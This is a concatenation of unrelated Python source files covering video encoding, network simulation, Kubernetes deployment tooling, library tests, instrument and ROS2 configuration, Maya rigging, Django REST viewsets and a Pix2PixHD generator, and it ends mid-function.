audio_input_stream = StreamInput(input_id=created_input.id,
input_path=RELATIVE_INPUT_FILE_PATH,
selection_mode=SelectionMode.AUTO)
##########################
# streams
video_streams = []
audio_streams = []
for video_config in video_configs:
stream = Stream(codec_configuration_id=video_config.id,
input_streams=[video_input_stream],
name='{}_stream'.format(video_config.name))
stream = bitmovin.encodings.Stream.create(object_=stream, encoding_id=encoding.id).resource
video_streams.append(stream)
for audio_config in audio_configs:
stream = Stream(codec_configuration_id=audio_config.id,
input_streams=[audio_input_stream],
name='{}_stream'.format(audio_config.name))
stream = bitmovin.encodings.Stream.create(object_=stream, encoding_id=encoding.id).resource
audio_streams.append(stream)
acl_entry = ACLEntry(permission=ACLPermission.PUBLIC_READ)
##########################
# muxing_streams
video_muxing_streams = []
audio_muxing_streams = []
for stream in video_streams:
muxing_stream = MuxingStream(stream.id)
video_muxing_streams.append({'mux': muxing_stream, 'stream': stream})
for stream in audio_streams:
muxing_stream = MuxingStream(stream.id)
audio_muxing_streams.append({'mux': muxing_stream, 'stream': stream})
##########################
# dash muxings
video_fmp4_muxings = []
audio_fmp4_muxings = []
for video_muxing_stream in video_muxing_streams:
stream = video_muxing_stream['stream']
muxing = video_muxing_stream['mux']
encoding_output = EncodingOutput(output_id=created_output.id,
output_path=RELATIVE_OUTPUT_PATH + 'video_dash/{}/'.format(stream.name),
acl=[acl_entry])
stream_array = [muxing]
muxing = FMP4Muxing(segment_length=4,
segment_naming='seg_%number%.m4s',
init_segment_name='init.mp4',
streams=stream_array,
outputs=[encoding_output],
name='dash_video_muxing_{}'.format(stream.name))
created_muxing = bitmovin.encodings.Muxing.FMP4.create(object_=muxing, encoding_id=encoding.id).resource
video_fmp4_muxings.append({'muxing': created_muxing, 'stream': stream, 'muxing_stream': muxing, 'output': encoding_output})
for audio_muxing_stream in audio_muxing_streams:
stream = audio_muxing_stream['stream']
muxing = audio_muxing_stream['mux']
encoding_output = EncodingOutput(output_id=created_output.id,
output_path=RELATIVE_OUTPUT_PATH + 'audio_dash/{}/'.format(stream.name),
acl=[acl_entry])
stream_array = [muxing]
muxing = FMP4Muxing(segment_length=4,
segment_naming='seg_%number%.m4s',
init_segment_name='init.mp4',
streams=stream_array,
outputs=[encoding_output],
name='dash_audio_muxing_{}'.format(stream.name))
created_muxing = bitmovin.encodings.Muxing.FMP4.create(object_=muxing, encoding_id=encoding.id).resource
audio_fmp4_muxings.append({'muxing': created_muxing, 'stream': stream, 'muxing_stream': muxing,
'output': encoding_output})
bitmovin.encodings.Encoding.start(encoding_id=encoding.id)
try:
bitmovin.encodings.Encoding.wait_until_finished(encoding_id=encoding.id)
except BitmovinError as bitmovin_error:
print('Exception occurred while waiting for encoding to finish: {}'.format(bitmovin_error))
manifest_output = EncodingOutput(output_id=created_output.id,
output_path='{}manifests/'.format(RELATIVE_OUTPUT_PATH),
acl=[acl_entry])
##########################
# dash manifest
dash_manifest = DashManifest(manifest_name='example_manifest_dash.mpd',
outputs=[manifest_output],
name='Sample DASH Manifest')
dash_manifest = bitmovin.manifests.DASH.create(dash_manifest).resource
period = Period()
period = bitmovin.manifests.DASH.add_period(object_=period, manifest_id=dash_manifest.id).resource
video_adaptation_set = VideoAdaptationSet()
video_adaptation_set = bitmovin.manifests.DASH.add_video_adaptation_set(object_=video_adaptation_set,
manifest_id=dash_manifest.id,
period_id=period.id).resource
audio_adaptation_set = AudioAdaptationSet(lang='en')
audio_adaptation_set = bitmovin.manifests.DASH.add_audio_adaptation_set(object_=audio_adaptation_set,
manifest_id=dash_manifest.id,
period_id=period.id).resource
for video_fmp4_muxing in video_fmp4_muxings:
muxing = video_fmp4_muxing['muxing']
encoding_output = video_fmp4_muxing['output']
video_fmp4_representation = FMP4Representation(FMP4RepresentationType.TEMPLATE,
encoding_id=encoding.id,
muxing_id=muxing.id,
segment_path='/{}'.format(encoding_output.outputPath))
video_fmp4_representation = bitmovin.manifests.DASH.add_fmp4_representation(object_=video_fmp4_representation,
manifest_id=dash_manifest.id,
period_id=period.id,
adaptationset_id=video_adaptation_set.id
).resource
for audio_fmp4_muxing in audio_fmp4_muxings:
muxing = audio_fmp4_muxing['muxing']
encoding_output = audio_fmp4_muxing['output']
audio_fmp4_representation = FMP4Representation(FMP4RepresentationType.TEMPLATE,
encoding_id=encoding.id,
muxing_id=muxing.id,
segment_path='/{}'.format(encoding_output.outputPath))
audio_fmp4_representation = bitmovin.manifests.DASH.add_fmp4_representation(object_=audio_fmp4_representation,
manifest_id=dash_manifest.id,
period_id=period.id,
adaptationset_id=audio_adaptation_set.id
).resource
bitmovin.manifests.DASH.start(manifest_id=dash_manifest.id)
try:
bitmovin.manifests.DASH.wait_until_finished(manifest_id=dash_manifest.id)
except BitmovinError as bitmovin_error:
print('Exception occurred while waiting for manifest creation to finish: {}'.format(bitmovin_error))
if __name__ == '__main__':
main()
|
485403
|
import tacoma as tc
import matplotlib.pyplot as pl
from collections import Counter
from itertools import izip
import numpy as np
def get_hist_from_counter(c):
data = np.array(c.items(),dtype=float)
x = data[:,0]
y = data[:,1] / data[:,1].sum()
return x,y
def get_hist_from_list(l,bins=400):
y,x = np.histogram(l,bins=bins)
y = np.array(y,dtype=float)
y /= y.sum()
x = 0.5*(x[1:]+x[:-1])
return x,y
N = 1000
t_sim = 10000*N
t_eq = 10000*N
t_total = t_sim + t_eq
lambda_ = 1.0
b0 = 0.6
b1 = 0.8
plot_size = False
print "simulating"
result = tc.ZSBB_model([],N,lambda_,b0,b1,t_sim,t_equilibration=t_eq,seed=1346,record_sizes_and_durations=True)
print "done"
fig, ax = pl.subplots(1,3,figsize=(12,4))
x,y = get_hist_from_list(np.array(result.contact_durations,dtype=float)/float(N))
#x,y = get_hist_from_counter(Counter(result.contact_durations))
ax[1].plot(x,y,'s')
y2 = (1+x)**(-2*b1-1)
ax[1].plot(x,y2/y2.sum())
x,y = get_hist_from_list(np.array(result.inter_contact_durations,dtype=float)/float(N))
ax[1].plot(x,y,'.')
y2 = (1+x)**(-2*b0-1)
ax[1].plot(x,y2/y2.sum())
ax[1].set_yscale('log')
ax[1].set_xscale('log')
if plot_size:
size_count = Counter(result.initial_size_histogram)
this_count = Counter(size_count)
for ch in result.group_changes:
this_count += Counter(ch)
size_count += this_count
x,y = get_hist_from_counter(size_count)
ax[0].plot(x,y,'s')
ax[0].set_yscale('log')
ax[0].set_xscale('log')
m_edges = 0
ks = []
print len(result.edges_in[0])
print result.edges_in[0]
edges_in = result.edges_in
edges_out = result.edges_out
for e_in,e_out in izip(edges_in,edges_out):
#print ch, e_in, e_out
m_in = len(e_in)
m_out = len(e_out)
m_edges += m_in
m_edges -= m_out
mean_k= 2*m_edges /float(N)
ks.append(mean_k)
t = np.array(result.t,dtype=float)
t /= N
print len(ks), len(result.t)
ax[2].plot(t,ks,'-')
ax[2].plot(np.array([t_eq,t_eq],dtype=float)/N,[0,0.25],'-')
ax[2].set_xscale('log')
pl.show()
|
485406
|
import click
from .base import cluster_command
@cluster_command.command(
add_help_option=False,
context_settings=dict(
allow_interspersed_args=False,
ignore_unknown_options=True,
),
)
@click.pass_context
@click.argument(
"kubectl_arguments",
nargs=-1,
type=click.UNPROCESSED,
)
def kubectl(ctx, kubectl_arguments):
'''Run kubectl with the connected Kubernetes cluster.'''
ctx.obj.controller.exec_kubectl(kubectl_arguments)
|
485420
|
import argparse
import datetime
import glob
import os
import string
import sys
import typing
from deployctl.config import config
from deployctl.shell import kubectl, get_most_recent_tag, image_exists, get_k8s_deployments
KUSTOMIZATION_TEMPLATE = """---
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
bases:
- ../../base
commonLabels:
deployment: '{deployment_name}'
nameSuffix: '-{deployment_name}'
images:
- name: gnomad-reads-server
newName: {reads_server_image_repository}
newTag: '{reads_server_tag}'
- name: gnomad-reads-api
newName: {reads_api_image_repository}
newTag: '{reads_api_tag}'
"""
def deployments_directory() -> str:
path = os.path.realpath(os.path.join(os.path.dirname(__file__), "../../manifests/reads/deployments"))
if not os.path.exists(path):
os.makedirs(path)
return path
def list_deployments() -> None:
print("Local configurations")
print("====================")
paths = reversed(sorted(glob.iglob(f"{deployments_directory()}/*/kustomization.yaml"), key=os.path.getmtime))
for path in paths:
print(os.path.basename(os.path.dirname(path)))
print()
print("Cluster deployments")
print("===================")
for deployment in get_k8s_deployments("component=gnomad-reads"):
print(deployment[len("gnomad-reads-") :])
def create_deployment(name: str, reads_server_tag: str = None, reads_api_tag: str = None) -> None:
if not name:
name = datetime.datetime.now().strftime("%Y%m%d-%H%M")
else:
allowed_characters = set(string.ascii_lowercase) | set(string.digits) | {"-"}
if set(name).difference(allowed_characters):
raise ValueError(f"invalid deployment name '{name}'")
if name == "latest":
raise ValueError("'latest' cannot be used for a deployment name")
deployment_directory = os.path.join(deployments_directory(), name)
if os.path.exists(deployment_directory):
raise RuntimeError(f"deployment '{name}' already exists")
if reads_server_tag:
if not image_exists(config.reads_server_image_repository, reads_server_tag):
raise RuntimeError(f"could not find image {config.reads_server_image_repository}:{reads_server_tag}")
else:
reads_server_tag = get_most_recent_tag(config.reads_server_image_repository)
print(f"No server tag provided, using most recent ({reads_server_tag})")
if reads_api_tag:
if not image_exists(config.reads_api_image_repository, reads_api_tag):
raise RuntimeError(f"could not find image {config.reads_api_image_repository}:{reads_api_tag}")
else:
reads_api_tag = get_most_recent_tag(config.reads_api_image_repository)
print(f"No API tag provided, using most recent ({reads_api_tag})")
os.makedirs(deployment_directory)
with open(os.path.join(deployment_directory, "kustomization.yaml"), "w") as kustomization_file:
kustomization = KUSTOMIZATION_TEMPLATE.format(
deployment_name=name,
reads_server_image_repository=config.reads_server_image_repository,
reads_server_tag=reads_server_tag,
reads_api_image_repository=config.reads_api_image_repository,
reads_api_tag=reads_api_tag,
)
kustomization_file.write(kustomization)
print(f"configured deployment '{name}'")
def apply_deployment(name: str) -> None:
deployment_directory = os.path.join(deployments_directory(), name)
if not os.path.exists(deployment_directory):
raise RuntimeError(f"no configuration for deployment '{name}'")
kubectl(["apply", "-k", deployment_directory])
def delete_deployment(name: str, clean: bool = False) -> None:
deployment_directory = os.path.join(deployments_directory(), name)
if os.path.exists(deployment_directory):
kubectl(["delete", "-k", deployment_directory])
if clean:
clean_deployment(name)
else:
create_deployment(name)
delete_deployment(name, clean=True)
def clean_deployment(name: str) -> None:
deployment_directory = os.path.join(deployments_directory(), name)
os.remove(os.path.join(deployment_directory, "kustomization.yaml"))
os.rmdir(deployment_directory)
def main(argv: typing.List[str]) -> None:
parser = argparse.ArgumentParser(prog="deployctl")
subparsers = parser.add_subparsers()
list_parser = subparsers.add_parser("list")
list_parser.set_defaults(action=list_deployments)
create_parser = subparsers.add_parser("create")
create_parser.set_defaults(action=create_deployment)
create_parser.add_argument("--name")
create_parser.add_argument("--server-tag", dest="reads_server_tag")
create_parser.add_argument("--api-tag", dest="reads_api_tag")
apply_parser = subparsers.add_parser("apply")
apply_parser.set_defaults(action=apply_deployment)
apply_parser.add_argument("name")
delete_parser = subparsers.add_parser("delete")
delete_parser.set_defaults(action=delete_deployment)
delete_parser.add_argument("name")
delete_parser.add_argument("--clean", action="store_true")
clean_parser = subparsers.add_parser("clean")
clean_parser.set_defaults(action=clean_deployment)
clean_parser.add_argument("name")
args = parser.parse_args(argv)
if "action" not in args:
parser.print_usage()
sys.exit(1)
action = args.action
del args.action
try:
action(**vars(args))
except Exception as err: # pylint: disable=broad-except
print(f"Error: {err}", file=sys.stderr)
sys.exit(1)
|
485448
|
from datetime import date, datetime
from decimal import Decimal
from convtools import conversion as c
def test_pipes():
assert c.list_comp(c.inline_expr("{0} ** 2").pass_args(c.this)).pipe(
c.call_func(sum, c.this)
).pipe(
c.call_func(
lambda x, a: x + a,
c.this,
c.naive({"abc": 10}).item(c.input_arg("key_name")),
)
).pipe(
[c.this, c.this]
).execute(
[1, 2, 3], key_name="abc", debug=False
) == [
24,
24,
]
assert c.item(0).pipe(datetime.strptime, "%Y-%m-%d").pipe(
c.call_func(lambda dt: dt.date(), c.this)
).execute(["2019-01-01"], debug=False) == date(2019, 1, 1)
assert c.item(0).pipe(datetime.strptime, "%Y-%m-%d").pipe(
c.this.call_method("date")
).execute(["2019-01-01"], debug=False) == date(2019, 1, 1)
conv = c.dict_comp(
c.item("name"),
c.item("transactions").pipe(
c.list_comp(
{
"id": c.item(0).as_type(str),
"amount": c.item(1).pipe(
c.if_(c.this, c.this.as_type(Decimal), None)
),
}
)
),
).gen_converter(debug=False)
assert conv([{"name": "test", "transactions": [(0, 0), (1, 10)]}]) == {
"test": [
{"id": "0", "amount": None},
{"id": "1", "amount": Decimal("10")},
]
}
assert c.this.pipe(lambda it: it).filter(c.this).sort().as_type(
list
).execute((2, 1, 0)) == [1, 2]
def test_pipe_single_call_functions():
class CustomException(Exception):
pass
def one_off_func():
if one_off_func.first:
one_off_func.first = False
return 1
raise CustomException
one_off_func.first = True
assert (
c.list_comp(
c.call_func(one_off_func).pipe(
(
c.this + 1,
c.this + 2,
)
)
).gen_converter(debug=False)([1])
== [(2, 3)]
)
def test_pipe_conversion():
from convtools import conversion as c
from convtools.base import PipeConversion
assert PipeConversion(c.naive([1, 2, 3]), c.item(1)).execute(None) == 2
assert (
PipeConversion(c.item("key1"), c.item("key2")).execute(
{"key1": {"key2": 3}}, debug=False
)
== 3
)
assert (
c.this.pipe(c.list_comp(c.this + 1))
.filter(c.this > 3)
.execute([1, 2, 3, 4, 5, 6], debug=False)
) == [4, 5, 6, 7]
c.aggregate(
c.ReduceFuncs.Array(c.item("key"), default=list).pipe(
c.if_(
c.call_func(any, c.generator_comp(c.this.is_(None))),
c.call_func(list),
c.this,
)
)
).gen_converter(debug=False)
def test_iter_method():
assert (
c.this.iter(c.this * 3)
.filter(c.this)
.as_type(list)
.execute(
[1, 2, 3, 0, 1],
debug=False,
)
== [3, 6, 9, 3]
)
assert c.group_by(c.item(0)).aggregate(
c(
[
c.item(0),
c.item(1).pipe(c.ReduceFuncs.Max(c.this)),
]
)
.iter(c.this * 100)
.as_type(tuple)
).execute([(0, 1), (0, 2), (1, 7)], debug=False) == [
(0, 200),
(100, 700),
]
def test_pipe_filter_sort():
assert (
c.this.as_type(list)
.pipe(c.iter(c.this + 1))
.filter(c.this > 3)
.sort(key=lambda x: x, reverse=True)
.execute(range(7), debug=False)
) == [7, 6, 5, 4]
assert c.this.sort().execute([3, 1, 2]) == [1, 2, 3]
def test_pipe_label_args():
assert (
c.this.pipe(
c.this,
label_input={"label1": c.input_arg("abc")},
label_output={"label2": c.input_arg("cde")},
).execute(None, abc=1, cde=2)
is None
)
|
485515
|
from unittest import mock
from crowdin_api.api_resources import StoragesResource
from crowdin_api.requester import APIRequester
class TestStoragesResource:
resource_class = StoragesResource
def get_resource(self, base_absolut_url):
return self.resource_class(requester=APIRequester(base_url=base_absolut_url))
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_list_storages(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.list_storages(page=10) == "response"
m_request.assert_called_once_with(
method="get",
params=resource.get_page_params(page=10, offset=None, limit=None),
path="storages",
)
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_add_storage(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.add_storage("SOME_FILE") == "response"
m_request.assert_called_once_with(method="post", path="storages", file="SOME_FILE")
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_get_storage(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.get_storage(storageId=1) == "response"
m_request.assert_called_once_with(method="get", path="storages/1")
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_delete_storage(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.delete_storage(storageId=1) == "response"
m_request.assert_called_once_with(method="delete", path="storages/1")
|
485547
|
class InvalidRequestObject(object):
def __init__(self):
self.errors = list()
def __nonzero__(self):
return False
__bool__ = __nonzero__
def add_error(self, parameter, value):
self.errors.append({'parameter': parameter, 'message': value})
def has_errors(self):
return bool(len(self.errors))
class ValidRequestObject(object):
def __nonzero__(self):
return True
__bool__ = __nonzero__
@classmethod
def from_dict(cls, adict):
raise NotImplementedError
|
485562
|
import matplotlib
import pytest
import plotly.graph_objects as go
from data_describe.core.time import (
_pandas_compute_stationarity_test,
adf_test,
kpss_test,
_pandas_compute_decompose_timeseries,
_pandas_compute_autocorrelation,
plot_autocorrelation,
stationarity_test,
)
import data_describe as dd
from data_describe.compat import _is_dataframe
matplotlib.use("Agg")
def test_plot_unsupported(compute_time_data):
with pytest.raises(ValueError):
dd.plot_time_series("this_is_a_string", col="var")
with pytest.raises(ValueError):
dd.plot_time_series(df=compute_time_data, col=1, decompose=True)
def test_stationarity_unsupported(compute_time_data):
with pytest.raises(ValueError):
_pandas_compute_stationarity_test(
compute_time_data["var"], test="not a valid test"
)
with pytest.raises(ValueError):
stationarity_test(compute_time_data, col=["var"])
with pytest.raises(ValueError):
stationarity_test("Not a dataframe", col=["var"])
def test_pandas_compute_stationarity_test(compute_time_data):
test_df = _pandas_compute_stationarity_test(
compute_time_data["var"], test="dickey-fuller"
)
assert _is_dataframe(test_df)
assert test_df.shape == (7, 1)
test_df = _pandas_compute_stationarity_test(compute_time_data["var"], test="kpss")
assert _is_dataframe(test_df)
assert test_df.shape == (7, 1)
def test_adf_test(compute_time_data):
df = adf_test(compute_time_data["var"])
adf_idx = [
"Test Statistic",
"p-value",
"Lags Used",
"Number of Observations Used",
"Critical Value (1%)",
"Critical Value (5%)",
"Critical Value (10%)",
]
assert df.shape == (7, 1)
assert df.index.tolist() == adf_idx
assert df.columns[0] == "stats"
def test_kpss_test(compute_time_data):
df = kpss_test(compute_time_data["var"])
kpss_idx = [
"Test Statistic",
"p-value",
"Lags Used",
"Critical Value (10%)",
"Critical Value (5%)",
"Critical Value (2.5%)",
"Critical Value (1%)",
]
assert df.shape == (7, 1)
assert df.index.tolist() == kpss_idx
assert df.columns[0] == "stats"
def test_decompose_timeseries(_statsmodels, compute_time_data):
result = _pandas_compute_decompose_timeseries(
compute_time_data, col="var", model="additive"
)
assert isinstance(result, _statsmodels.tsa.seasonal.DecomposeResult)
assert len(result.trend) == 15
assert len(result.observed) == 15
assert len(result.seasonal) == 15
assert len(result.resid) == 15
def test_pandas_compute_autocorrelation(compute_time_data):
data, white_noise = _pandas_compute_autocorrelation(
compute_time_data["var"], n_lags=1, plot_type="pacf"
)
assert len(data) == 2
assert isinstance(white_noise, float)
data, white_noise = _pandas_compute_autocorrelation(
compute_time_data["var"], n_lags=1, plot_type="acf", fft=False
)
assert len(data) == 15
assert isinstance(white_noise, float)
# NOTE: decomposition object in modin does not preserve index
def test_plotly(compute_time_data):
fig = dd.plot_time_series(
compute_time_data, col="var", viz_backend="plotly", model="additive"
)
assert isinstance(fig, go.Figure)
fig = dd.plot_time_series(
compute_time_data, col=["var"], viz_backend="plotly", model="additive"
)
assert isinstance(fig, go.Figure)
fig = dd.plot_time_series(
compute_time_data,
col="var",
decompose=True,
model="additive",
viz_backend="plotly",
)
assert isinstance(fig, go.Figure)
fig = plot_autocorrelation(
compute_time_data,
col="var",
n_lags=1,
plot_type="acf",
fft=False,
viz_backend="plotly",
)
assert isinstance(fig, go.Figure)
fig = plot_autocorrelation(
compute_time_data, col="var", n_lags=1, plot_type="pacf", viz_backend="plotly"
)
assert isinstance(fig, go.Figure)
def test_seaborn(compute_time_data):
fig = dd.plot_time_series(compute_time_data, col="var")
assert isinstance(fig, matplotlib.artist.Artist)
fig = dd.plot_time_series(
compute_time_data, col="var", decompose=True, model="additive"
)
assert isinstance(fig, matplotlib.artist.Artist)
fig = plot_autocorrelation(compute_time_data, col="var", n_lags=1, plot_type="pacf")
assert isinstance(fig, matplotlib.figure.Figure)
|
485565
|
description = 'Multi tomo setup with four motors in Experimental Chamber 1, currently only 3 motors implemented'
group = 'optional'
tango_base = 'tango://antareshw.antares.frm2.tum.de:10000/antares/'
devices = dict(
sry_multi_1 = device('nicos.devices.entangle.Motor',
description = 'Multitomo sample rotation 1',
tangodevice = tango_base + 'copley/m01',
abslimits = (-400, 400),
),
sry_multi_2 = device('nicos.devices.entangle.Motor',
description = 'Multitomo sample rotation 2',
tangodevice = tango_base + 'copley/m02',
abslimits = (-400, 400),
),
sry_multi_3 = device('nicos.devices.entangle.Motor',
description = 'Multitomo sample rotation 3',
tangodevice = tango_base + 'copley/m03',
abslimits = (-400, 400),
),
# sry_multi_4 = device('nicos.devices.entangle.Motor',
# description = 'Multitomo sample rotation 4',
# tangodevice = tango_base + 'copley/m04',
# abslimits = (-400, 400),
# ),
)
|
485578
|
from launch import LaunchDescription
from launch_ros.actions import Node
from launch.substitutions import LaunchConfiguration
from launch.actions import DeclareLaunchArgument
def generate_launch_description():
test_var = LaunchConfiguration("test_var", default="A_param_value")
return LaunchDescription([
DeclareLaunchArgument(
"test_var",
default_value=test_var,
description="This is the test variable to be sent into node parameter"
),
Node(
package='learning_ros2_launch_by_example',
executable='learning_ros2_launch_by_example_node',
name='parameter_test',
output="screen",
parameters=[{"test_param_value": test_var}]
),
])
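# A hypothetical invocation overriding the declared argument from the command line
# (the launch file name is a placeholder):
#   ros2 launch learning_ros2_launch_by_example <this_launch_file>.launch.py test_var:=my_value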
|
485585
|
from maya import cmds
from maya.api import OpenMaya
from maya.api import OpenMayaAnim
from skinning.utils import api
from skinning.utils import math
from skinning.utils import skin
from skinning.utils import decorator
__all__ = [
"create_projection_plane"
]
AXIS = {
"x": OpenMaya.MVector(1, 0, 0),
"y": OpenMaya.MVector(0, 1, 0),
"z": OpenMaya.MVector(0, 0, 1),
}
@decorator.preserve_selection
def create_projection_plane(joints, name=None, axis="z", width=25, padding=0, offset=0):
"""
Create a projector plane for the given influences. The points of the
plane are calculated using the provided width and axis. After that a
skin cluster is created.
:param list[str] joints:
:param str/None name:
:param str axis:
:param int/float width:
:param int padding:
:param int offset:
:return: Projection plane
:rtype: str
:raise ValueError: When fewer than 2 joints are provided.
:raise ValueError: When axis is not valid.
"""
num = len(joints)
if num < 2:
raise ValueError("Projection plane can only be created "
"when providing at least 2 joints.")
elif axis not in AXIS:
raise ValueError("Provided axis '{}' is not valid, "
"options are; {}.".format(axis, list(AXIS.keys())))
name = name or "projector#"
plane = cmds.polyPlane(subdivisionsX=1, subdivisionsY=num - 1, constructionHistory=False, name=name)[0]
matrices = [OpenMaya.MMatrix(cmds.xform(node, query=True, worldSpace=True, matrix=True)) for node in joints]
weights = OpenMaya.MDoubleArray()
influences = OpenMaya.MIntArray(range(num))
# calculate new matrices by blending matrices using the provided padding.
# this will ensure a smoother rotational transition between joints.
if padding > 0:
matrices_padded = []
for i, matrix in enumerate(matrices):
matrix = OpenMaya.MTransformationMatrix(matrix)
translation = matrix.translation(OpenMaya.MSpace.kWorld)
padding_value = min([min([i, padding]), min([num - i - 1, num - padding])])
matrix_padding = [matrices[j] for j in range(i - padding_value, i + padding_value + 1) if 0 <= j < num]
matrix_average = math.average_matrix(matrix_padding)
matrix_average = OpenMaya.MTransformationMatrix(matrix_average)
matrix_average = OpenMaya.MTransformationMatrix(matrix_average.asRotateMatrix())
matrix_average.setTranslation(translation, OpenMaya.MSpace.kWorld)
matrix_average.setScale(OpenMaya.MVector(1, 1, 1), OpenMaya.MSpace.kWorld)
matrices_padded.append(matrix_average.asMatrix())
matrices = matrices_padded
# position plane vertices
for i, matrix in enumerate(matrices):
for j, multiplier in enumerate([-1, 1]):
vertex = (i * 2) + j
point = OpenMaya.MPoint(AXIS[axis] * width * multiplier) * matrix
cmds.xform("{}.vtx[{}]".format(plane, vertex), translation=list(point)[:3])
influence = min([max([0, i - offset]), num - 1])
for k in range(num):
weights.append(int(influence == k))
# create skin cluster
skin_cluster = cmds.skinCluster(
joints,
plane,
name="{}_SK".format(name),
toSelectedBones=True,
removeUnusedInfluence=False,
maximumInfluences=4,
obeyMaxInfluences=True,
bindMethod=0,
skinMethod=0, # linear
normalizeWeights=1, # interactive
weightDistribution=0, # distance
)[0]
# set weights
dag, component = api.conversion.get_component(plane)
skin_cluster_obj = api.conversion.get_object(skin_cluster)
skin_cluster_fn = OpenMayaAnim.MFnSkinCluster(skin_cluster_obj)
    skin.set_weights(skin_cluster_fn, dag, component, influences, weights)
    return plane
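# Usage sketch (joint names are hypothetical; run inside a Maya session with the
# skinning package on the path):
#
#   plane = create_projection_plane(["joint_01", "joint_02", "joint_03"], axis="z", width=25)
#
# This builds a 1 x (len(joints) - 1) polyPlane, snaps each vertex row onto the
# corresponding joint matrix and binds the plane with one influence per row.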
|
485607
|
from django.contrib.auth.models import Group
from django.contrib.auth.models import User as AuthUser
from rest_framework import permissions, viewsets
from core.models import (
AssignedData,
Data,
DataLabel,
DataPrediction,
Label,
Model,
Profile,
Project,
Queue,
)
from core.pagination import SmartPagination
from core.serializers import (
AssignedDataSerializer,
AuthUserGroupSerializer,
AuthUserSerializer,
CoreModelSerializer,
DataLabelSerializer,
DataPredictionSerializer,
DataSerializer,
LabelSerializer,
ProfileSerializer,
ProjectSerializer,
QueueSerializer,
)
# TODO establish more restrictive permissions
# AuthUsers should be write-only for unauthenticated users
# Creation/update/deletion of certain objects that will be
# managed by the server probably shouldn't be exposed via the API
# (ex. Queues, Models, AssignedData, many-to-many join fields)
class ProfileViewSet(viewsets.ModelViewSet):
queryset = Profile.objects.all().order_by("id")
serializer_class = ProfileSerializer
permission_classes = (permissions.IsAuthenticated,)
class AuthUserGroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all().order_by("id")
serializer_class = AuthUserGroupSerializer
permission_classes = (permissions.IsAuthenticated,)
class AuthUserViewSet(viewsets.ModelViewSet):
queryset = AuthUser.objects.all().order_by("id")
serializer_class = AuthUserSerializer
permission_classes = (permissions.IsAuthenticated,)
class ProjectViewSet(viewsets.ModelViewSet):
queryset = Project.objects.all().order_by("id")
serializer_class = ProjectSerializer
permission_classes = (permissions.IsAuthenticated,)
class CoreModelViewSet(viewsets.ModelViewSet):
queryset = Model.objects.all().order_by("id")
serializer_class = CoreModelSerializer
permission_classes = (permissions.IsAuthenticated,)
class DataViewSet(viewsets.ModelViewSet):
queryset = Data.objects.all().order_by("id")
serializer_class = DataSerializer
permission_classes = (permissions.IsAuthenticated,)
pagination_class = SmartPagination
class LabelViewSet(viewsets.ModelViewSet):
queryset = Label.objects.all().order_by("id")
serializer_class = LabelSerializer
permission_classes = (permissions.IsAuthenticated,)
class DataLabelViewSet(viewsets.ModelViewSet):
queryset = DataLabel.objects.all().order_by("id")
serializer_class = DataLabelSerializer
permission_classes = (permissions.IsAuthenticated,)
class DataPredictionViewSet(viewsets.ModelViewSet):
queryset = DataPrediction.objects.all().order_by("id")
serializer_class = DataPredictionSerializer
permission_classes = (permissions.IsAuthenticated,)
class QueueViewSet(viewsets.ModelViewSet):
queryset = Queue.objects.all().order_by("id")
serializer_class = QueueSerializer
permission_classes = (permissions.IsAuthenticated,)
class AssignedDataViewSet(viewsets.ModelViewSet):
queryset = AssignedData.objects.all().order_by("id")
serializer_class = AssignedDataSerializer
permission_classes = (permissions.IsAuthenticated,)
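# Routing sketch (not part of this module): these viewsets are typically exposed
# through a DRF router in the project's urls.py, e.g.
#
#   from django.urls import include, path
#   from rest_framework import routers
#   router = routers.DefaultRouter()
#   router.register(r"profiles", ProfileViewSet)
#   router.register(r"projects", ProjectViewSet)
#   urlpatterns = [path("api/", include(router.urls))]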
|
485633
|
from typing import List, Tuple
import copy
import torch
import torchelie.nn as tnn
import torchelie.utils as tu
import torch.nn as nn
class Pix2PixHDGlobalGenerator(tnn.CondSeq):
"""
Residual generator used in `Pix2PixHD <https://arxiv.org/abs/1711.11585>`_
.
:code:`arch` is a list of strings representing blocks.
    For example, the following creates a first conv with 32 output channels,
    3 downsampling stride-2 convs, 5 residual blocks, 3 upsampling convs, and a
    final conv that converts back to RGB::

        Pix2PixHDGlobalGenerator(['32', 'd128', 'd512', 'd512', 'R512', 'R512',
            'R512', 'R512', 'R512', 'u512', 'u512', 'u128'])
"""
def __init__(self, arch: List[str]) -> None:
super().__init__()
self.arch = arch
self.to_standard_arch()
def to_standard_arch(self):
self._modules.clear()
arch = self.arch
self.input = tnn.ConvBlock(3, int(arch[0]), 3)
ch, i = int(arch[0]), 1
ii = 0
self.encode = tnn.CondSeq()
while arch[i][0] == 'd':
out_ch = int(arch[i][1:])
self.encode.add_module(f'conv_{ii}',
tnn.ConvBlock(ch, out_ch, 3, stride=2))
ch = out_ch
i += 1
ii += 1
ii = 0
self.transform = tnn.CondSeq()
while arch[i][0] == 'R':
out_ch = int(arch[i][1:])
resblock = tnn.PreactResBlock(ch, out_ch)
tnn.utils.insert_after(resblock.branch, 'bn1',
tnn.Noise(1, inplace=False), 'noise')
self.transform.add_module(f'transform_{ii}', resblock)
ch = out_ch
i += 1
ii += 1
self.transform.add_module('norm', nn.InstanceNorm2d(ch))
self.transform.add_module('relu', nn.ReLU(True))
self.transform[0].preact_skip()
ii = 0
self.decode = tnn.CondSeq()
while i < len(arch) and arch[i][0] == 'u':
out_ch = int(arch[i][1:])
convblock = tnn.ConvBlock(ch, out_ch, 3, stride=1).add_upsampling()
self.decode.add_module(f'out_conv_{ii}', convblock)
tnn.utils.insert_after(convblock, 'norm',
tnn.Noise(1, inplace=True), 'noise')
ch = out_ch
i += 1
ii += 1
self.to_rgb = tnn.ConvBlock(out_ch, 3, 3).remove_batchnorm()
self.to_rgb.relu = nn.Sigmoid()
def to_instance_norm(m):
if isinstance(m, nn.BatchNorm2d):
return nn.InstanceNorm2d(m.num_features, affine=True)
if isinstance(m, nn.Conv2d):
